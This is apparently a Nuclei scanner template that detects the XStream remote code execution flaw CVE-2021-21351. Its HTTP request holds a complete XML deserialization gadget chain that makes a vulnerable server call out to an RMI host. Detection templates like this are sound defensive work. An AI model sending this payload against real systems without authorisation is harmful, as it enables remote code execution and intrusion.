XStream <1.4.16 - Remote Code Execution

id: CVE-2021-21351

info:
  name: XStream <1.4.16 - Remote Code Execution
  author: pwnhxl
  severity: critical
  description: |
    XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351
    - https://x-stream.github.io/CVE-2021-21351.html
    - https://paper.seebug.org/1543/
    - http://x-stream.github.io/changes.html#1.4.16
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21351
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-21351
    cwe-id: CWE-434
    epss-score: 0.73084
    epss-percentile: 0.98014
    cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: xstream_project
    product: xstream
  tags: cve2021,cve,xstream,deserialization,rce,oast,vulhub,xstream_project

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <sorted-set>
          <javax.naming.ldap.Rdn_-RdnEntry>
            <type>ysomap</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
              <m__DTMXRTreeFrag>
                <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
                  <m__size>-10086</m__size>
                  <m__mgrDefault>
                    <__overrideDefaultParser>false</__overrideDefaultParser>
                    <m__incremental>false</m__incremental>
                    <m__source__location>false</m__source__location>
                    <m__dtms>
                      <null/>
                    </m__dtms>
                    <m__defaultHandler/>
                  </m__mgrDefault>
                  <m__shouldStripWS>false</m__shouldStripWS>
                  <m__indexing>false</m__indexing>
                  <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
                    <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
                      <javax.sql.rowset.BaseRowSet>
                        <default>
                          <concurrency>1008</concurrency>
                          <escapeProcessing>true</escapeProcessing>
                          <fetchDir>1000</fetchDir>
                          <fetchSize>0</fetchSize>
                          <isolation>2</isolation>
                          <maxFieldSize>0</maxFieldSize>
                          <maxRows>0</maxRows>
                          <queryTimeout>0</queryTimeout>
                          <readOnly>true</readOnly>
                          <rowSetType>1004</rowSetType>
                          <showDeleted>false</showDeleted>
                          <dataSource>rmi://{{interactsh-url}}/test</dataSource>
                          <listeners/>
                          <params/>
                        </default>
                      </javax.sql.rowset.BaseRowSet>
                      <com.sun.rowset.JdbcRowSetImpl>
                        <default/>
                      </com.sun.rowset.JdbcRowSetImpl>
                    </fPullParserConfig>
                    <fConfigSetInput>
                      <class>com.sun.rowset.JdbcRowSetImpl</class>
                      <name>setAutoCommit</name>
                      <parameter-types>
                        <class>boolean</class>
                      </parameter-types>
                    </fConfigSetInput>
                    <fConfigParse reference='../fConfigSetInput'/>
                    <fParseInProgress>false</fParseInProgress>
                  </m__incrementalSAXSource>
                  <m__walker>
                    <nextIsRaw>false</nextIsRaw>
                  </m__walker>
                  <m__endDocumentOccured>false</m__endDocumentOccured>
                  <m__idAttributes/>
                  <m__textPendingStart>-1</m__textPendingStart>
                  <m__useSourceLocationProperty>false</m__useSourceLocationProperty>
                  <m__pastFirstElement>false</m__pastFirstElement>
                </m__dtm>
                <m__dtmIdentity>1</m__dtmIdentity>
              </m__DTMXRTreeFrag>
              <m__dtmRoot>1</m__dtmRoot>
              <m__allowRelease>false</m__allowRelease>
            </value>
          </javax.naming.ldap.Rdn_-RdnEntry>
          <javax.naming.ldap.Rdn_-RdnEntry>
            <type>ysomap</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
              <m__obj class='string'>test</m__obj>
            </value>
          </javax.naming.ldap.Rdn_-RdnEntry>
        </sorted-set>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "timestamp"
          - "com.thoughtworks.xstream"
        condition: or

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 500
# digest: 4b0a00483046022100f29c7be274baa128b1b19d0598c8a3d7805a5f14b3073a1aa9d6dae05ad2a533022100a39cddf06232b2de875c43c80596a232347000e49418a3f927b430ed8c8abbfc:922c64590222798bb761d5b6d8e72950